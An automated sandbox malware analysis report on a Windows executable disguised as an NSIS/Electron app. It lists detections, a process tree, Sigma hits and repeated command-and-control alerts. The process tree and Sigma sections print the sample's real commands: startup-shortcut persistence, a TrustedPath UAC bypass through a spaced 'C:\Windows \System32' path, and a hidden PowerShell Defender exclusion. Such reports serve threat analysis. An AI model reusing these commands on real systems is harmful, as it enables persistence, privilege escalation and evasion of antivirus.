Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YoS6ZBCcUy.exe

Overview

General Information

Sample name:YoS6ZBCcUy.exe
renamed because original name is a hash value
Original sample name:9e19fd2499e9ffb9ca4eab08d9054a86.exe
Analysis ID:1570242
MD5:9e19fd2499e9ffb9ca4eab08d9054a86
SHA1:198946086afa2544e8f86463f15fa321aa45f7e0
SHA256:7fedcec3a38dec8650ae2f64271b19c01372881ce83f1fe4597f85b26c4a0732
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Sigma detected: Powershell create lnk in startup
Sigma detected: TrustedPath UAC Bypass Pattern
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Delayed program exit found
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • YoS6ZBCcUy.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\YoS6ZBCcUy.exe" MD5: 9E19FD2499E9FFB9CA4EAB08D9054A86)
    • cmd.exe (PID: 7404 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7456 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • find.exe (PID: 7484 cmdline: "C:\Windows\system32\find.exe" "NSIS.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
  • NSIS.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • NSIS.exe (PID: 8176 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 8184 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1020 cmdline: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2936 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2504 cmdline: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • winSAT.exe (PID: 7232 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
        • winSAT.exe (PID: 7456 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
          • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7280 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NSIS.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 5468 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7692 cmdline: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • winSAT.exe (PID: 1144 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
        • winSAT.exe (PID: 2700 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2656 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • Bginfo.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300 MD5: 3AEF228FB7EE187160482084D36C9726)
  • NSIS.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2672 cmdline: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NSIS.exe (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • cmd.exe (PID: 7464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4852 cmdline: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • winSAT.exe (PID: 7636 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
        • winSAT.exe (PID: 1028 cmdline: "C:\Windows \System32\winSAT.exe" MD5: FC2414F108B613366BDE7AE897AB53A1)
          • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6100 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • NSIS.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
    • NSIS.exe (PID: 6704 cmdline: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8 MD5: BD4906B9305AFEC35A88A3387BCB9FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: TrustedPath UAC Bypass Pattern
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\winSAT.exe" , CommandLine: "C:\Windows \System32\winSAT.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\winSAT.exe, NewProcessName: C:\Windows \System32\winSAT.exe, OriginalFileName: C:\Windows \System32\winSAT.exe, ParentCommandLine: powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2504, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows \System32\winSAT.exe" , ProcessId: 7232, ProcessName: winSAT.exe
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, ProcessId: 7940, TargetFilename: C:\Windows \System32\version.dll
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows \System32\winSAT.exe" , ParentImage: C:\Windows \System32\winSAT.exe, ParentProcessId: 7456, ParentProcessName: winSAT.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", ProcessId: 7280, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows \System32\winSAT.exe" , ParentImage: C:\Windows \System32\winSAT.exe, ParentProcessId: 7456, ParentProcessName: winSAT.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", ProcessId: 7280, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows \System32\winSAT.exe" , ParentImage: C:\Windows \System32\winSAT.exe, ParentProcessId: 7456, ParentProcessName: winSAT.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }", ProcessId: 7280, ProcessName: powershell.exe
Sigma detected: Startup Folder File Write
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()", CommandLine: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8184, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()", ProcessId: 1020, ProcessName: powershell.exe

Persistence and Installation Behavior

barindex
Sigma detected: Powershell create lnk in startup
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe, ParentProcessId: 7940, ParentProcessName: NSIS.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"", ProcessId: 8184, ProcessName: cmd.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T17:33:23.326106+010020365941Malware Command and Control Activity Detected192.168.2.450097185.42.12.392404TCP
2024-12-06T17:34:16.295057+010020365941Malware Command and Control Activity Detected192.168.2.449754185.42.12.392404TCP
2024-12-06T17:34:18.810694+010020365941Malware Command and Control Activity Detected192.168.2.449760185.42.12.392404TCP
2024-12-06T17:34:21.670027+010020365941Malware Command and Control Activity Detected192.168.2.449766185.42.12.392404TCP
2024-12-06T17:34:24.467011+010020365941Malware Command and Control Activity Detected192.168.2.449777185.42.12.392404TCP
2024-12-06T17:34:27.154419+010020365941Malware Command and Control Activity Detected192.168.2.449783185.42.12.392404TCP
2024-12-06T17:34:29.857612+010020365941Malware Command and Control Activity Detected192.168.2.449790185.42.12.392404TCP
2024-12-06T17:34:32.560765+010020365941Malware Command and Control Activity Detected192.168.2.449798185.42.12.392404TCP
2024-12-06T17:34:35.248231+010020365941Malware Command and Control Activity Detected192.168.2.449806185.42.12.392404TCP
2024-12-06T17:34:37.951419+010020365941Malware Command and Control Activity Detected192.168.2.449812185.42.12.392404TCP
2024-12-06T17:34:40.638879+010020365941Malware Command and Control Activity Detected192.168.2.449819185.42.12.392404TCP
2024-12-06T17:34:43.373506+010020365941Malware Command and Control Activity Detected192.168.2.449826185.42.12.392404TCP
2024-12-06T17:34:46.092053+010020365941Malware Command and Control Activity Detected192.168.2.449835185.42.12.392404TCP
2024-12-06T17:34:48.842096+010020365941Malware Command and Control Activity Detected192.168.2.449841185.42.12.392404TCP
2024-12-06T17:34:51.576418+010020365941Malware Command and Control Activity Detected192.168.2.449847185.42.12.392404TCP
2024-12-06T17:34:54.263959+010020365941Malware Command and Control Activity Detected192.168.2.449853185.42.12.392404TCP
2024-12-06T17:34:57.248318+010020365941Malware Command and Control Activity Detected192.168.2.449863185.42.12.392404TCP
2024-12-06T17:35:00.310896+010020365941Malware Command and Control Activity Detected192.168.2.449869185.42.12.392404TCP
2024-12-06T17:35:02.998328+010020365941Malware Command and Control Activity Detected192.168.2.449876185.42.12.392404TCP
2024-12-06T17:35:05.701447+010020365941Malware Command and Control Activity Detected192.168.2.449883185.42.12.392404TCP
2024-12-06T17:35:08.451458+010020365941Malware Command and Control Activity Detected192.168.2.449892185.42.12.392404TCP
2024-12-06T17:35:11.107713+010020365941Malware Command and Control Activity Detected192.168.2.449898185.42.12.392404TCP
2024-12-06T17:35:13.810843+010020365941Malware Command and Control Activity Detected192.168.2.449905185.42.12.392404TCP
2024-12-06T17:35:16.513990+010020365941Malware Command and Control Activity Detected192.168.2.449912185.42.12.392404TCP
2024-12-06T17:35:19.201461+010020365941Malware Command and Control Activity Detected192.168.2.449921185.42.12.392404TCP
2024-12-06T17:35:21.920262+010020365941Malware Command and Control Activity Detected192.168.2.449927185.42.12.392404TCP
2024-12-06T17:35:24.670238+010020365941Malware Command and Control Activity Detected192.168.2.449934185.42.12.392404TCP
2024-12-06T17:35:27.467121+010020365941Malware Command and Control Activity Detected192.168.2.449940185.42.12.392404TCP
2024-12-06T17:35:30.170272+010020365941Malware Command and Control Activity Detected192.168.2.449950185.42.12.392404TCP
2024-12-06T17:35:33.060928+010020365941Malware Command and Control Activity Detected192.168.2.449956185.42.12.392404TCP
2024-12-06T17:35:35.764027+010020365941Malware Command and Control Activity Detected192.168.2.449963185.42.12.392404TCP
2024-12-06T17:35:38.467150+010020365941Malware Command and Control Activity Detected192.168.2.449969185.42.12.392404TCP
2024-12-06T17:35:41.154719+010020365941Malware Command and Control Activity Detected192.168.2.449978185.42.12.392404TCP
2024-12-06T17:35:43.970221+010020365941Malware Command and Control Activity Detected192.168.2.449985185.42.12.392404TCP
2024-12-06T17:35:46.467219+010020365941Malware Command and Control Activity Detected192.168.2.449992185.42.12.392404TCP
2024-12-06T17:35:49.154922+010020365941Malware Command and Control Activity Detected192.168.2.449998185.42.12.392404TCP
2024-12-06T17:35:51.756033+010020365941Malware Command and Control Activity Detected192.168.2.450005185.42.12.392404TCP
2024-12-06T17:35:54.357862+010020365941Malware Command and Control Activity Detected192.168.2.450011185.42.12.392404TCP
2024-12-06T17:35:56.967223+010020365941Malware Command and Control Activity Detected192.168.2.450020185.42.12.392404TCP
2024-12-06T17:35:59.467348+010020365941Malware Command and Control Activity Detected192.168.2.450027185.42.12.392404TCP
2024-12-06T17:36:01.857961+010020365941Malware Command and Control Activity Detected192.168.2.450033185.42.12.392404TCP
2024-12-06T17:36:04.466834+010020365941Malware Command and Control Activity Detected192.168.2.450039185.42.12.392404TCP
2024-12-06T17:36:06.764110+010020365941Malware Command and Control Activity Detected192.168.2.450045185.42.12.392404TCP
2024-12-06T17:36:09.264138+010020365941Malware Command and Control Activity Detected192.168.2.450052185.42.12.392404TCP
2024-12-06T17:36:11.654776+010020365941Malware Command and Control Activity Detected192.168.2.450057185.42.12.392404TCP
2024-12-06T17:36:13.967282+010020365941Malware Command and Control Activity Detected192.168.2.450058185.42.12.392404TCP
2024-12-06T17:36:16.388013+010020365941Malware Command and Control Activity Detected192.168.2.450059185.42.12.392404TCP
2024-12-06T17:36:18.654861+010020365941Malware Command and Control Activity Detected192.168.2.450060185.42.12.392404TCP
2024-12-06T17:36:20.967459+010020365941Malware Command and Control Activity Detected192.168.2.450061185.42.12.392404TCP
2024-12-06T17:36:23.264170+010020365941Malware Command and Control Activity Detected192.168.2.450062185.42.12.392404TCP
2024-12-06T17:36:25.467297+010020365941Malware Command and Control Activity Detected192.168.2.450063185.42.12.392404TCP
2024-12-06T17:36:27.764212+010020365941Malware Command and Control Activity Detected192.168.2.450064185.42.12.392404TCP
2024-12-06T17:36:29.967336+010020365941Malware Command and Control Activity Detected192.168.2.450065185.42.12.392404TCP
2024-12-06T17:36:32.170486+010020365941Malware Command and Control Activity Detected192.168.2.450066185.42.12.392404TCP
2024-12-06T17:36:34.467369+010020365941Malware Command and Control Activity Detected192.168.2.450067185.42.12.392404TCP
2024-12-06T17:36:36.467369+010020365941Malware Command and Control Activity Detected192.168.2.450068185.42.12.392404TCP
2024-12-06T17:36:38.654870+010020365941Malware Command and Control Activity Detected192.168.2.450069185.42.12.392404TCP
2024-12-06T17:36:41.264249+010020365941Malware Command and Control Activity Detected192.168.2.450070185.42.12.392404TCP
2024-12-06T17:36:43.381072+010020365941Malware Command and Control Activity Detected192.168.2.450071185.42.12.392404TCP
